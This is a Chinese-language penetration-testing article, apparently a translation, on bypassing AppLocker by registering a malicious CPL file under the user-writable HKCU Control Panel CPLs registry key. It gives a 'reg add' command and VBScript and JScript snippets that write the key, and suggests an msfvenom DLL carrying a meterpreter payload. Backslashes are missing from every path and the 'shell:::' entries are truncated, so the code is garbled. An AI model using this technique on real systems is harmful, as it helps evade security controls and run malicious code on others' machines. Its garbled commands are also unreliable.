繞過AppLocker系列之控制面板的利用

使用默認規則實現AppLocker不能提供任何充分的保護，因為通過使用合法的Windows二進位文件和利用常見的系統錯誤配置就會產生多個繞過方法。在Windows系統中，當用戶打開控制面板時，會載入多個CPL文件。這些CPL文件的列表是從註冊表中獲得的。

Francesco Mifsud 發現，當啟動控制面板時，將檢查以下兩個註冊表位置，然後載入CPL。

HKLMSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLsHKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLs

問題就出在第二個註冊表的位置，普通用戶具有寫入許可權，所以可以在註冊表中寫入一個註冊表鍵，該註冊表將在控制面板啟動時載入和執行惡意代碼。唯一的條件是用戶的系統允許打開控制面板和註冊表。註冊表二進位文件位於Windows文件夾內，默認情況下，AppLocker允許執行此文件夾內的所有內容。在大多數環境中也是允許控制面板運行的。

繞過AppLocker ——阻止 CMD 運行

第一步是創建一個DLL並將其重命名為.Cpl，以便它可以與控制面板一起執行。Metasploit 的Msfvenom可以創建一個自定義的DLL，其中可以包含一個嵌入的meterpreter有效負載或者Didier Stevens的 cmd DLL文件，可以用來繞過禁止cmd運行的限制。

以下命令將創建一個註冊表鍵，這個註冊表鍵的值將包含存儲在主機上的CPL文件的路徑。默認情況下，標準用戶對自己的配置單元是具有寫入許可權的。

reg add "HKCUSOFTWAREMicrosoftWindowsCurrentVersionControl PanelCpls"/v pentestlab.cpl /t REG_SZ /d "C:pentestlab.cpl"

繞過AppLocker —— 將註冊表鍵添加到註冊表

如果cmd被禁用，可以使用註冊表編輯器添加註冊表項：

註冊表編輯器 - 添加CPL註冊表鍵

Francesco Mifsud還發布了兩個腳本，可以在cmd和註冊表編輯器被阻止時將註冊表鍵添加到註冊表中。

VBScript：

const HKEY_CURRENT_USER = &H80000001 strComputer = "." Set objReg=GetObject("winmgmts:!" & strComputer & "rootdefault:StdRegProv") strKeyPath = "SoftwareMicrosoftWindowsCurrentVersionControl PanelCPLs"objReg.CreateKey HKEY_CURRENT_USER,strKeyPath strValueName = "pentestlabCPL"strValue = "C:pentestlabCPL.cpl"objReg.SetStringValueHKEY_CURRENT_USER,strKeyPath,strValueName,strValue

Jscript：

var obj = WScript.CreateObject("WScript.Shell");obj.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLs", "Top level key");obj.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLspentestlabCPL", "C:pentestlabCPL.cpl","REG_SZ");

從啟動控制面板的那一刻開始，代碼將被執行，cmd將被打開。

AppLocker Bypass - 通過控制面板命令提示符

在控制面板被阻止打開的情況下，可以使用以下位置作為啟動控制面板的替代方法。

· C:windowssystem32control.exe· AppDataRoamingMicrosoftWindowsStart MenuProgramsAccessoriesSystem ToolsControl Panel.lnk· shell:::· shell:::· shell:::· My Control Panel.

資源

https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/

點擊展開全文

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！